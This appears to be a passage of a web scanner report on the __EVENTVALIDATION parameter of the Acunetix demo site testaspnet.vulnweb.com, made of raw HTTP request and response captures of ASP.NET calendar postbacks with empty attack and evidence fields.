Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8188&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAPdYqRNoIZGRkCv5oXNV7I47cyprtHoSqTxvhKKo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKrpb2MDQK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9PJHrivj12qLRWomGoKk9a%2Fja6PQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:10 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAPdYqRNoIZGRkCv5oXNV7I47cyprtHoSqTxvhKKo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKrpb2MDQK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9PJHrivj12qLRWomGoKk9a/ja6PQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:White" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8286&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAuBItkdoIZGRk6YwnrYRaRcfeIbLKuRXOmV6fjE4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKs1Pv8BwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAi4CsnuQlBNsdZEkIIpCrRYCSPtm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:56 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAuBItkdoIZGRk6YwnrYRaRcfeIbLKuRXOmV6fjE4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKs1Pv8BwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAi4CsnuQlBNsdZEkIIpCrRYCSPtm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:White" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to 